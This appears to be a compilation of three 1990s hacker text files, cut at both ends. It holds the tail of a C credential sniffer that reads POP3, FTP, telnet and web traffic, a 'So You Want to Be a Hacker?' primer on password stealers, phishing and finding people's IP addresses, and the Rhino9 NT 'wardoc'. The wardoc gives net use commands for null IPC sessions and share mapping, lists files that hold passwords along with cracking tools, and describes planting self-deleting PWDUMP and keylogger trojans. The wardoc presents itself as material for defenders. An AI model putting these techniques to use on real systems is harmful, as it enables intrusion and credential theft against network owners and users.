((fp1=fopen(ws,"a+"))==NULL) { fprintf(stderr, "Can't open logfile: %s\n", strerror(errno)); exit(EXIT_FAILURE); } printf("Started [%s]\n",dateTime()); fflush(stdout); detach(); snprintf(lbuff,LBUFFL,"\n*** Started [%s] ***\n",dateTime()); logg(lbuff); ip=(struct iphdr *)(((unsigned long)ðer_packet.ip_header)-2); tcp=(struct tcphdr *)(((unsigned long)ðer_packet.tcp_header)-2); header_len=sizeof(ether_packet.ether_header) + sizeof(ether_packet.ip_header) + sizeof(ether_packet.tcp_header); clear_target(); for(;;) { while(1) { datalen=read(sock,ðer_packet,sizeof(ether_packet)); if(datalen > 1) { if (!packet_filter()) continue; datalen=datalen-header_len; if (datalen<1) continue; /* Any data in this packet? */ break; /* out of while() loop and process packet contents */ } } target.bytes_read=target.bytes_read+datalen; switch(ntohs(target.dest_port)) { /* Choose scan method */ case WEB_PORT1: case WEB_PORT2: case WEB_PORT3: http_scan(datalen,ether_packet.buff-2); break; case 109: /* pop2 */ case 110: /* pop3 */ pop3_scan(datalen,ether_packet.buff-2); break; case IPPORT_FTP: /* ftp */ case 106: /* poppasswd */ case 143: /* imap2 */ case IPPORT_TELNET: /* Telnet */ case IPPORT_LOGINSERVER: /* rlogin */ ascii_scan(datalen,ether_packet.buff-2); break; default: snprintf(lbuff,LBUFFL,"Unknown port: %d\n", ntohs(target.dest_port)); logg(lbuff); } } } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= So You Want to Be a Hacker? (-coldfire) December 98 � 1.1 I get numerous emails and messages daily from people who want to know how to be a hacker. This text is for them. I. Introduction II. What is a hacker? III. Why do people want to become a hacker? IV. How to be a hacker V. Gaining Knowledge 1). Read 2). Learn to program 3). Hack VI. Knowledge is Power 1). Getting someone's password 2). Getting someone's IP address VII. Seek, and ye shall find I. Introduction So you want to be a hacker? Many people want to be a hacker, but they don't know where to start, or what hacking really means. Hopefully this text will clear some things out and help you on your path to become a true hacker. II. What is a hacker? Everyone seems to have their own little definition of what a hacker is. The press views hackers as people who cause computer mischief, AOLers think hackers who are people who can push buttons on their downloaded proggies, computer nerds and rejects from society claim to be hackers because it makes them feel united and part of a group, crackers who write viruses and crash computers think they're hackers, and all thoses kewl people in those IRC chat rooms call themselves hackers, and so on. So what exactly is hacker? Here's the definition that I think most people would agree with: hacker 1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary. (taken from The Hacker's Dictionary) What exactly does this mean? A hacker is someone who is fascinated by computers, wants to learn more about them and then go beyond that. Hackers seek knowledge, especially forbidden or "secret" knowledge. One thing about being a hacker is to remember that knowledge is good, and should be shared with other hackers. III. Why do people want to become a hacker? Press, hyped up movies, and the huge growth of the Internet is drawing new hacker wannabes in everyday. It this good? Yes and no. It's mostly good, but it's also bad because some people don't really understand what a hacker is. They think hacking is sending out viruses, crashing computers and stealing passwords from some 12 year old girl off AOL. These things are definitely not cool. But what about the inside force that really makes people want to become a hacker? Hackers are the "elite" of the Internet. They know far more things than the average user, and can do things to computers that most people wouldn't even know were to start. There is a certain "ego satisfaction" to be a hacker. IV. How to be a hacker So, now that you know what a hacker is, and why some people want to become a hacker, here's what I have to say on how to be a hacker. First of all, it takes time to become a hacker. You can't just decide you want to be a hacker and then become one overnight. Second, there are no teachers (unless you're lucky and find a mentor). Most hackers taught themselves. They learned by reading, asking and doing. Now, a note about asking questions. Do not ask stupid questions like "HOW DO I HACK?" Ask questions that have an answer in a couple of sentences. If you do, your question will be answered most of the time. And third, to be a hacker, you have to hack. You can't just sit around and pretend to be a hacker. Do something with your newfound knowledge. But try to follow these two simple rules: Don't damage or screw up another system. You will get in trouble. Try not to piss people off. Make friends, not enemies. V. Gaining Knowledge 1). Read. Read everything you can about hacking. Articles, texts, books, magazines, message boards, anything with the word "hack" in it. Of course, anything computer related will also help. You're already doing a good job reading this text. Here are some hacking related books and magazines that I suggest you read: 2600 magazine - Very good source of hacking info. You can find it at your local bookstore, at the magazine rack. Just look for the number 2600. CYPERPUNK - A book about three different hackers. Cuckoo's Egg - Informative book about some guy tracking down a hacker who broke into his computer. Definitely not boring and can be informative to those with hardly no knowledge of how hacking into a computer is actually done. 2). Learn to Program. A hacker who can't program is like a skater who can't skate. This is one of the more devious parts of becoming a hacker because it takes time and patience. Why should a hacker know how to program? Because by learning how to program, a hacker can make a computer do whatever the hell he wants it to. And that's power. Have you ever found yourself saying "I wish I had a program to do that..." Well, if you learn to program, you can just make that program. So, where to start? First, you need to choose a programming language. The two most popular out are Visual Basic (VB) and C/C++. The difference between them? VB is easy to use and learn, but its programs aren't that fast and they require a runtime DLL file. C++ compiles fast programs, but is hard to learn and get started. Another difference between them is compatibility. VB is for Windows operating systems only (Win 3.11, Win95/98, WinNT), while C++ code can be made to run on practically any operating system (Windows, Unix, even Mac). Where can you get VB or C++? You buy it (or...ahem, cough, warez, cough, cough, friend with CD burner, cough, cough). Once you learn the basics of the programming language, learn Windows API. It's the guts of Windows. 3). Hack. Like I said before, in order to be a hacker, you have to hack. Hanging around in chat rooms won't help you. Hacking lets you "practice" your hacking skills. The more you practice, the better you get. After you're an experience hacker, contribute something to the hacker community. This could be a simple text file, a web page, or a [free] program. Oh, and help out those newbie hackers. You were one once. VI. Knowledge is Power The most frequent questions people ask me are how to get someone's password and how to get someone's IP address. Getting someone's password There are three main ways to get someone's password. 1). Social Engineering. By talking to someone who knows the password, you can try to "trick" them into giving you it. Be creative. The AOL equivalent is phishing (posing as an AOL technician or something, claiming to need the person's password), though phishing takes no skill and is hardly considered social engineering. 2). Password Stealers or Sniffers (PWS). A program installed on the user's machine that literally gets the password as it is being typed in. Some PWS also search for stored passwords. After a PWS obtains a password, it usually stores it or sends it out through email. You would probably have to make your own (learn to program!) if you want it to be effective, though sometimes there are pre-made ones. Those AOL PWS are mostly crap, most of them only steal the password from the Change Password Window, which is not very effective. 3). Password Cracker. A program on your machine that guesses passwords from a list. This can take some time, and would not be able to crack a user's password if it's not on the password list. Getting someone's IP Address First, you need to understand what an IP address is. Every computer connected to the Internet has an IP address, which is, in simple terms, equivalent to a phone number. It identifies the computer on the Internet. The IP address is where data is sent to and from. If the person is signing on through a dial up account, the IP address is usually different at each login. To find your IP address, click on the Start button, Run, and then type in winipcfg. And for you AOLer's who think who don't have an IP address, make sure that the listbox says "AOL Adapter," not "PPP Adapter." So, why get someone's IP address? Hell if I know. Maybe to do something lame, like nuke (crash) a computer, or maybe because a backdoor like NetBus or BackOrifice is installed. Anyway, IP addresses can be obtain through these methods: Email - It's in the header IRC - A simple /whois [nick] will return the IP address ICQ IP Sniffer - Due to a bug in the ICQ software, it is possible to type in an UIN and get the user's IP address. ICQ Software Bug - Another software bug? Yup, only this time you don't need an external prog. If you have someone on your contact list, you can disconnect and then check their info. Their IP address will be in the Last IP box! Works for older versions of ICQ. IP Stealer - I haven't seen one of these, but there should be some around. It would work like a Password Stealer, except it would get the IP address instead of the password. VII. Seek, and ye shall find. One of the most annoying questions I hear are "Do you have this?" or "Can you send me this?" or "Where can I get this?" Well, I'm going to tell you this TOP SECRET thing I found called a SEARCH ENGINE. You type in what you what you're looking for, and it gives you links to web pages that have the words in it! WOW! Okay, that was lame, anyway, any experienced web surfer will tell you that you can find anything on the web your heart desires. Whether that would be XXX pics, games, or how to be a hacker, its all there. You just need to know how to find it. Now, for search engines, I prefer www.yahoo.com and www.infoseek.com. When typing stuff in the search box, be sure you use + (plus sign) in front of words that you want combined. For example, let's say you're looking for an ICQ IP sniffer program. Now, if you just typed in "ICQ IP sniffer" (without the quotes), it would give you web sites like ICQ reviews, what IP addresses are, and pages about your mom (heh, j/k). But if you typed in "+ICQ +IP +sniffer," it will look for pages that have all those words. Understand? Also, another web browsing technique that I like to use is opening multiple windows. This is especially useful when you're like me, stuck with a 33.6 modem. Okay, so, let's say Infoseek found 15 page results that have to do with ICQ IP Sniffers. When I find a link I want to open, instead of just clicking on it, I would click the right mouse button to bring up that pop-up menu, and then click Open Link in New Window. This would open another browsing window. And then when I find another link I want to go to, I do the same thing. The purpose of all this? To view one page while another is loading. Congratulations, this concludes the So You Want to Be a Hacker? text. You have now earned your CHW (Certified Hacker Wannabe). So, one last question remains: How do you know when you're a hacker? Well, the answer is when someone tells you. -coldfire http://surf.to/coldfire Comments? Questions? Suggestions? Typos? Email coldfirez@usa.net And please, no "Where can I get�" questions. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =================================================================== THE WINDOWS NT WARDOC: A STUDY IN REMOTE NT PENETRATION BY NEONSURGE AND THE RHINO9 TEAM =================================================================== =================================================================== INTRODUCTION: =================================================================== This document is an attempt by the Rhino9 team to document the methodology and techniques used in an attack on a NT based network. The intent of this document is to educate administrators and security professionals of both the mindset of an attacker and a large set of the current NT penetration techniques. This document attempts to follow in the footsteps of the classic text, "How To Improve The Security Of Your Site by Breaking Into It" by Dan Farmer and Wietse Venema. Obviously, this text will not contain all known methods for NT network penetration. We have tried to put together a text that Administrators can use to learn basic penetration techniques to test the vulnerability of their own networks. If the concepts and techniques presented in this text are absorbed and understood, an Administrator should have a strong base knowledge of how penetrations occur and should be able to build upon that knowledge to further protect their network. This file is not meant for people that are new to security or NT or networking technologies. The authors assume that people reading this document have a certain understanding of protocols, server technologies and network architectures. The authors would like to continue expanding on this document and releasing updated versions of it. We call upon all those that wish to contribute techniques to send detailed information on your own penetration testing methods. We would like to release updates to this document to keep it a current and solid resource. Send your techniques or submissions to: neonsurge@hotmail.com. Valid and useful submissions will be incorporated in to the document with proper credit given to the author. =================================================================== USAGE =================================================================== The text is being written in a procedural manner. We have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done. The document is divided into 3 sections: NetBIOS, WebServer, and Miscellaneous, each of which explain different methods of information gathering and penetration techniques. =================================================================== INFORMATION GATHERING AND PENETRATION VIA NETBIOS =================================================================== The initial step an intruder would take is to portscan the target machine or network. It's surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine. Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done. Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT. When attacking an NT based network, NetBIOS tends to take the brunt of an attack. For this reason, NetBIOS will be the first serious topic of discussion in this paper. Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in. If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command. The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits. Interpretation the information can reveal more than one might think. Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval] Switches -a Lists the remote computer's name table given its host name. -A Lists the remote computer's name table given its IP address. -c Lists the remote name cache including the IP addresses. -n Lists local NetBIOS names. -r Lists names resolved by broadcast and via WINS. -R Purges and reloads the remote cache name table. -S Lists sessions table with the destination IP addresses. -s Lists sessions table conversions. The column headings generated by NBTSTAT have the following meanings: Input Number of bytes received. Output Number of bytes sent. In/Out Whether the connection is from the computer (outbound) or from another system to the local computer (inbound). Life The remaining time that a name table cache entry will "live" before your computer purges it. Local Name The local NetBIOS name given to the connection. Remote Host The name or IP address of the remote host. Type A name can have one of two types: unique or group. The last byte of the 16 character NetBIOS name often means something because the same name can be present multiple times on the same computer. This shows the last byte of the name converted into hex. State Your NetBIOS connections will be shown in one of the following "states": State Meaning Accepting An incoming connection is in process. Associated The endpoint for a connection has been created and your computer has associated it with an IP address. Connected This is a good state! It means you're connected to the remote resource. Connecting Your session is trying to resolve the name-to-IP address mapping of the destination resource. Disconnected Your computer requested a disconnect, and it is waiting for the remote computer to do so. Disconnecting Your connection is ending. Idle The remote computer has been opened in the current session, but is currently not accepting connections. Inbound An inbound session is trying to connect. Listening The remote computer is available. Outbound Your session is creating the TCP connection. Reconnecting If your connection failed on the first attempt, it will display this state as it tries to reconnect. Here is a sample NBTSTAT response of an actual machine: C:\>nbtstat -A x.x.x.x NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- DATARAT <00> UNIQUE Registered R9LABS <00> GROUP Registered DATARAT <20> UNIQUE Registered DATARAT <03> UNIQUE Registered GHOST <03> UNIQUE Registered DATARAT <01> UNIQUE Registered MAC Address = 00-00-00-00-00-00 Using the table below, what can you learn about the machine? Name Number Type Usage ========================================================================= 00 U Workstation Service 01 U Messenger Service <\\_MSBROWSE_> 01 G Master Browser 03 U Messenger Service 06 U RAS Server Service 1F U NetDDE Service 20 U File Server Service 21 U RAS Client Service 22 U Exchange Interchange 23 U Exchange Store 24 U Exchange Directory 30 U Modem Sharing Server Service 31 U Modem Sharing Client Service 43 U SMS Client Remote Control 44 U SMS Admin Remote Control Tool 45 U SMS Client Remote Chat 46 U SMS Client Remote Transfer 4C U DEC Pathworks TCPIP Service 52 U DEC Pathworks TCPIP Service 87 U Exchange MTA 6A U Exchange IMC BE U Network Monitor Agent BF U Network Monitor Apps 03 U Messenger Service 00 G Domain Name 1B U Domain Master Browser 1C G Domain Controllers 1D U Master Browser 1E G Browser Service Elections 1C G Internet Information Server 00 U Internet Information Server [2B] U Lotus Notes Server IRISMULTICAST [2F] G Lotus Notes IRISNAMESERVER [33] G Lotus Notes Forte_$ND800ZA [20] U DCA Irmalan Gateway Service Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique. Group (G): A normal group; the single name may exist with many IP addresses. Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25. Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names. Domain Name (D): New in NT 4.0. An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it's share of vulnerabilities, so this type of information is certainly useful to an intruder. The next logical step would be to glean possible usernames from the remote machine. A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins. Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools (For more information about the SID tools, read appendix B). The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials. To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt: c:\>net use \\[ip address of target machine]\ipc$ "" /user:"" If the connection is successful, the intruder could do a number of things other than gleaning a user list, but lets start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As a stand alone tool, this process is manual and very time consuming. Userlist.pl is a perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information. At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine. Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user - all through a null IPC session. This information gathering ability will appear in Rhino9's soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below. With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows: c:\>net view \\[ip address of remote machine] Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons): C:\>net view \\ System error 5 has occurred. Access is denied. C:\>net use \\\ipc$ "" /user:"" The command completed successfully. C:\>net view \\ Shared resources at \\ Share name Type Used as Comment ------------------------------------------------------------------------------- Accelerator Disk Agent Accelerator share for Seagate backup Inetpub Disk mirc Disk NETLOGON Disk Logon server share www_pages Disk The command completed successfully. As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored. The release of the WindowsNT 4.0 Resource Kit made a new set of tools available to both administrator and intruder alike. Below is a description of some of the Resource Kit Utilities that the Rhino9 team has used in conjunction with the IPC$ null session to gather information. When reading these tool descriptions and the information they provide, keep in mind that the null session that is used does NOT provide the remote network with any real credentials. UsrStat: This command-line utility displays the username, full name, and last logon date and time for each user in a given Domain. Below is an actual cut and paste of this tool used through a null IPC session against a remote network: C:\NTRESKIT>usrstat domain4 Users at \\STUDENT4 Administrator - - logon: Tue Nov 17 08:15:25 1998 Guest - - logon: Mon Nov 16 12:54:04 1998 IUSR_STUDENT4 - Internet Guest Account - logon: Mon Nov 16 15:19:26 1998 IWAM_STUDENT4 - Web Application Manager account - logon: Never laurel - - logon: Never megan - - logon: Never In order to fully understand what is happening in the capture, lets discuss it. Before the actual attack took place, a mapping was put into the lmhosts file that reflected the Student4 machine and it's Domain activity status using the #PRE/#DOM tags (explained in more detail below.). The entry was then preloaded into the NetBIOS cache, and a null IPC session was established. As you can see, the command is issued against the Domain name. The tool will then query the Primary Domain Controller for that Domain. Global: This command-line utility displays the members of global groups on remote servers or domains. As discussed above, this utility is used in conjunction with an Lmhosts/IPC mapping. Shown below is an actual capture of the global tool. In the example, the "Domain Users" is a standard, default global group present in a WindowsNT domain. For this example, we have used the tool to query Domain1 for a listing of all users in the "Domain Users" group. C:\>global "Domain Users" domain1 Bob SPUPPY$ BILLY BOB$ Bill IUSR_BILLY BOB IWAM_BILLY BOB IUSR_SPUPPY IWAM_SPUPPY Local: The Local tool works just as the Global tool does, except it queries the machine for the members of a local group instead of a global group. Below is an example of the Local tool querying a server for a list of its Administrators group. C:\>local "administrators" domain1 Bob Domain Admins Bill NetDom: NetDom is a tool that will query a server for its role in a domain, as well as querying the machine for its PDC. The NetDom tool also works with an Lmhosts/IPC mapping. Below is a capture of the tool and its standard output: Querying domain information on computer \\SPUPPY ... The computer \\SPUPPY is a domain controller of DOMAIN4. Searching PDC for domain DOMAIN4 ... Found PDC \\SPUPPY The computer \\SPUPPY is the PDC of DOMAIN4. NetWatch: NetWatch is a tool that will give the person invoking the tool a list of the shares on a remote machine. Again, this tool works with an Lmhosts/IPC mapping. The bad thing about this tool is that the Rhino9 team was able to use the tool to retrieve a list of the hidden shares on the remote machine. Other known penetration techniques that involve the IPC share include opening the registry of the remote machine, as well as a remote User Manager for Domains technique. The IPC null connection could allow an intruder to potentially gain access to your registry. Once the null IPC session has been established, the intruder would launch his local regedit utility and attempt the Connect Network Registry option. If this is succesful, the intruder would have read access to certain regsitry keys, and potentially read/write. Regardless, even read access to the registry is undesirable from a security standpoint. An intruder could also attempt the IPC User Manager for Domains technique. This technique is relatively unknown and often times produces no results. We are covering it because it can produce results and it can be an effective intrusion technique. This technique involves a null IPC session and entries into the LMHOSTS file. The LMHOSTS file is (normally) a local file kept on windows based machines to map NetBIOS names to IP addresses. Used mostly in non-WINS environments, or on clients unable to use WINS, the LMHOSTS file can actually be used in many different ways by an intruder. Different uses for the LMHOSTS file will be discussed later in this text, for now we will discuss how the LMHOSTS file is used in this technique. This is an excellent technique to discuss because it shows how one of the previous techniques is used in conjunction with this one to accomplish a goal. Beginning with a portscan, and assuming that port 139 is open, the attacker would issue an nbtstat command. The intruder would then glean the NetBIOS name of the remote machine from the nbtstat results. Lets look at the same sample nbtstat results from above: C:\>nbtstat -A x.x.x.x NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- DATARAT <00> UNIQUE Registered R9LABS <00> GROUP Registered DATARAT <20> UNIQUE Registered DATARAT <03> UNIQUE Registered GHOST <03> UNIQUE Registered DATARAT <01> UNIQUE Registered MAC Address = 00-00-00-00-00-00 By examining the results of the nbtstat command, we are looking for the <03> identifier. If someone is logged on locally on the machine, you will see two <03> identifiers. Normally the first <03> listed is the netbios name of the machine and the second <03> identifier listed is the name of the locally logged on user. At this point the intruder would put the netbios name and ip address mapping of the machine into his local LMHOSTS file, ending the entry with the #PRE and #DOM tags. The #PRE tag denotes that the entry should be preloaded into the netbios cache. The #DOM tag denotes domain activity. At this point the intruder would issue a nbtstat -R command to preload the entry into his cache. Technically, this preloading would make the entry appear as if it had been resolved by some previous network function and allow the name to be resolved much quicker. Next the intruder would establish a null IPC session. Once the null IPC session has been succesfully established, the intruder would launch his local copy of User Manager for Domains and use the Select Domain function in User Manager. The Domain of the remote machine will appear (or can manually be typed in) because it has been pre-loaded into the cache. If the security of the remote machine is lax, User Manager will display a list of all the users on the remote machine. If this is being done over a slow link (i.e. 28.8 modem) it will normally not work. On faster network connections however, this tends to produce results. Now that the intruder has gathered information about your machine, the next step would be to actually attempt a penetration of that machine. The first penetration technique to be discussed will be the open file share attack. The intruder would couple the previously discussed net view command with a net use command to accomplish this attack. Taking the net view from above, lets discuss the attack. C:\>net view \\ Shared resources at \\ Share name Type Used as Comment ------------------------------------------------------------------------------- Accelerator Disk Agent Accelerator share for Seagate backup Inetpub Disk mirc Disk NETLOGON Disk Logon server share www_pages Disk The command completed successfully. Once the attacker has a list of the remote shares, he could then attempt to map to a remote share. An example of the command structure for the attack would be: c:\>net use x: \\\inetpub This attack will only work if the share is unpassworded or shared out to the everyone group (NOTE: The Everyone group means Everyone. If someone connects as a null user, they are now part of the everyone group.). If those parameters are in place, the attacker would be able to map a network drive to your machine and begin what could amount to a severe series of penetration attacks. Keep in mind that the intruder is not limited to mapping drives to the shares displayed by the net view command. An intruder that knows NT or has done his homework knows that NT has hidden administrative shares. By default, NT creates the IPC$ share and one hidden share for every drive on the machine (i.e. a machine that has C, D, and E drives would have corresponding hidden shares of C$, D$, and E$). There is also a hidden ADMIN$ share that maps directly to the installation path of NT itself (i.e. If you installed NT on C:\winnt, than ADMIN$ maps to that exact portion of that drive). One thing that the Rhino9 team has noticed about the majority of the NT security community is that they seem to be oblivious to the concept of penetrating one internal NT machine from another internal NT machine. The Rhino9 team, during our professional audits, has accomplished this task many times. Chances are, if the intruder is good and can gain access to one of your machines, he will worm his way into the rest of your network. For that reason, these share attacks can pose a serious threat. (As a side note, the Rhino9 team was once contacted to perform a remote penetration audit for one of the largest ISP's in Florida. We gained access to a share on one of the technician's personal machines, and from there gained access to the entire network. It can be done.) At first, someone may not be able to see the dangers of someone having access to your hard drive. Access to the hard drive opens up new avenues for Information Gathering and Trojan/Virus planting. An attacker would normally look for something that could possibly contain a password or highly sensitive data that he could use to continue digging his way into your network. Some of the files that a intruder will look for and use are listed below, each with a brief description of what it is, and how it would be used. Eudora.ini: This file is used to store configuration information for eudora e-mail software. An easily obtainable tool called eudpass.com will extract the individuals username and password information as well as all the information that the attacker needs to begin eavesdropping on the users mail. At this point, the intruder could configure his own e-mail software to read the targets mail. Again, some could have a hard time seeing the dangers in this, but remember that generally, people are creatures of habit. The chances that the user's e-mail password is the same password they use to log into the network at work are relatively high. Now all the attacker needs to do is keep snooping around on the users hard drive for a resume or some other work related document to point him in the direction of the persons place of business, allowing him to launch a somewhat strong initial strike against the network. Tree.dat: This is the file that is used by the popular software CuteFTP to store the users ftp site/username/password combinations. Using a program called FireFTP, the attacker can easily crack the tree.dat file. So, as above, the user could keep gathering information about you and launch an attack against your place of business. Not to mention that if you have an ftp mapping in your tree.dat that maps directly to your place of business, his attack has now become much easier. PWL: PWL's generally reside on Win95 machines. They are used to store operation specific passwords for the Windows95 end user. A tool called glide.exe will crack (with less than desirable efficiency) PWL files. There is also documentation available on how to manually crack the encryption of these PWL files using a calculator. Continuing the scenario, the attacker could keep gathering information about the user and formulate an attack. PWD: PWD files exist on machines running FrontPage or Personal Webserver. These files include the plain text username and an encrypted password matching the credentials needed to administer the website. The encryption scheme used for these passwords is the standard DES scheme. Needless to say, many DES cracking utilities are available on the internet. John the Ripper by Solar Designer very efficiently cracks these passwords. WS_FTP.ini: This ini file exists on machines using ws_ftp software. Although an automated password extractor for this file has just recently been introduced into the security community, the encryption mechanism used is not very strong. The password is converted to hex numbers (2 digits). If a digit is at the N position, then N is added to the digit. Reverse the process and you have cracked this encryption scheme. (This is also known to sometimes work for cracking PMail.ini - Pegasus Mail and Prefs.js - Netscape.) IDC Files: IDC (internet database connecter) files are normally used for back-end connectivity to databases from a webserver. Becuase this type of connection generally requires authentication, some IDC files contain username/password combinations, often times in clear text. waruser.dat: This is one of the config files for WarFTP, the popular Win32 FTP server. This particular dat file could contain the administrative password for the FTP server itself. From what the authors have been able to find out, this only occurs in beta versions of WarFTP 1.70. $winnt$.inf: During an unattended installation of WindowsNT, the setup process requires information files. As residue of this unattended installation process, a file called $winnt$.inf could exist in the %systemroot%\system32 directory. This file could contain the username and password combination of the account that was used during the installation. Because the account used in these types of installations normally require some strong permission sets on the network, this is not a trivial matter. Sam._: Although people have known for a long time that the SAM database could present a problem if it fell into the wrong hands, many people forget about the sam._. Many would-be intruders have asked themselves how they could copy the SAM database if they could mount a drive across the net. Well, normally this is not possible, because the NT server you are connected to is running, and while it is running, it locks the SAM. However, if the administrator has created an emergency repair disk, a copy of the SAM should be located in the %systemroot%\repair\ directory. This file will be named sam._. This copy, by default is EVERYONE readable. By using a copy of the samdump utility, you can dump username/password combinations from the copied SAM. ExchVerify.log: The ExchVerify.log file is created by Cheyenne/Innoculan/ArcServe. Normally created by the installation of the Cheyenne/Innoculan/ArcServe software, this file resides at the root of the drive where the software installation took place. This file can contain extremely sensitive information, as shown below: : ExchAuthenticate() called with NTServerName:[SAMPLESERVER] NTDomainName[SAMPLESERVER] adminMailbox:[administrator] adminLoginName:[administrator] password:[PASSWORD] Needless to say, the file contains information that an intruder could easily use to further compromise the integrity of your network. Profile.tfm: Profile.tfm is a file that is created by the POP3 client software AcornMail. At the writing of this document, AcornMail began getting alot of attention from the internet community. Upon inspection of the software, we found that it's an efficient POP3 client, but the installation is not NTFS friendly. After the installation of the software, we began to check into the files that AcornMail created. We found that the Profile.tfm file held the username/password combination. At first, we decided the software was somewhat ok, because it did indeed store the password in an encrypted state. We then realized that the permissions on the profile.tfm file were set to Everyone/Full Control. This causes problems because anyone could obtain a copy of the file and plug this file into their own AcornMail installation. Then intruder coud log on with the stored information. Below is a capture in Network Monitor of just that. 00000000 00 01 70 4C 67 80 98 ED A1 00 01 01 08 00 45 00 ..pLg.........E. 00000010 00 4A EA A7 40 00 3D 06 14 88 CF 62 C0 53 D1 36 .J..@.=....b.S.6 00000020 DD 91 00 6E 04 44 F6 1E 84 D6 00 32 51 EB 50 18 ...n.D.....2Q.P. 00000030 22 38 64 9E 00 00 2B 4F 4B 20 50 61 73 73 77 6F "8d...+OK.Passwo 00000040 72 64 20 72 65 71 75 69 72 65 64 20 66 6F 72 20 rd.required.for. 00000050 68 6B 69 72 6B 2E 0D 0A jjohn... 00000000 98 ED A1 00 01 01 00 01 70 4C 67 80 08 00 45 00 ........pLg...E. 00000010 00 36 A4 02 40 00 80 06 18 41 D1 36 DD 91 CF 62 .6..@....A.6...b 00000020 C0 53 04 44 00 6E 00 32 51 EB F6 1E 84 F8 50 18 .S.D.n.2Q.....P. 00000030 21 AC 99 90 00 00 50 41 53 53 20 67 68 6F 73 74 !.....PASS.xerox 00000040 37 33 0D 0A 63.. As you can see, the username/password is indeed passed in clear text. This is not a fault of AcornMail, but something that has been present in the POPvX. This 'data' file swapping/packet sniffing type of technique has been tested by the Rhino9 team on numerous software titles, so this attack is not limited to AcornMail. Now that we have discussed the files an intruder may wish to acquire if he gains access to your hard drive, lets discuss Trojan planting. If there is one thing that can gain an attacker a ton of information, it is trojan planting. The open file share attack generally makes trojan planting extremely easy to do. One of the easiest and most informative trojans to use is the PWDUMP utility wrapped in a batch file. If prepared correctly, the batch file will execute minimized (also named something clever, such as viruscan.cmd), run the PWDUMP utility, delete the PWDUMP utility after it has run its course, and finally erase itself. This generally leaves little evidence and will create a nice text file of all of the username/password combinations on that machine. Rules of the trick: The target must be an NT machine and the end user executing the trojan must be the administrator, so the attacker drops the batch file into the Administrators start-up folder and waits. The next time the Administrator logs in to the machine, the batch file executes and dumps the username/password combinations. Then the attacker connects back into the machine via file sharing and collects the results. Another solid attack an intruder might try is to place a keylogger batch into the start-up folder. This can usually be done to any user, not just the administrator. This will glean all keystrokes issued by that user, minus initial logon credentials (due to the NT architecture, which stops all user mode processes during login). The attacker then connects back to the target machine at a later time and collects the recorded keystrokes. One of the deadliest trojan attacks issued is a batch file that runs as Administrator and sets up a scheduled event using the AT command. Because the AT command can execute as System, it can create copies of the SAM database and the registry. Imagine the fun an attacker can have with that one. How does one prevent such attacks? By not sharing items to the everyone group, and by enforcing strong password schemes in your environment. If an intruder comes across a server that prompts him for credentials at every turn, chances are the intruder will become frustrated and leave. Other, more persistant intruders, will continue on with a Brute Force Attack. Undoubtedly the most common tool for Brute Force NetBIOS attacks is NAT. The NAT (NetBIOS Auditing Tool) tool will allow a user to automate network connection commands using a list of possible usernames and passwords. NAT will attempt to connect to the remote machine using every username and every password in the lists provided. This can be a lengthy process, but often times an attacker will use a shortened list of common 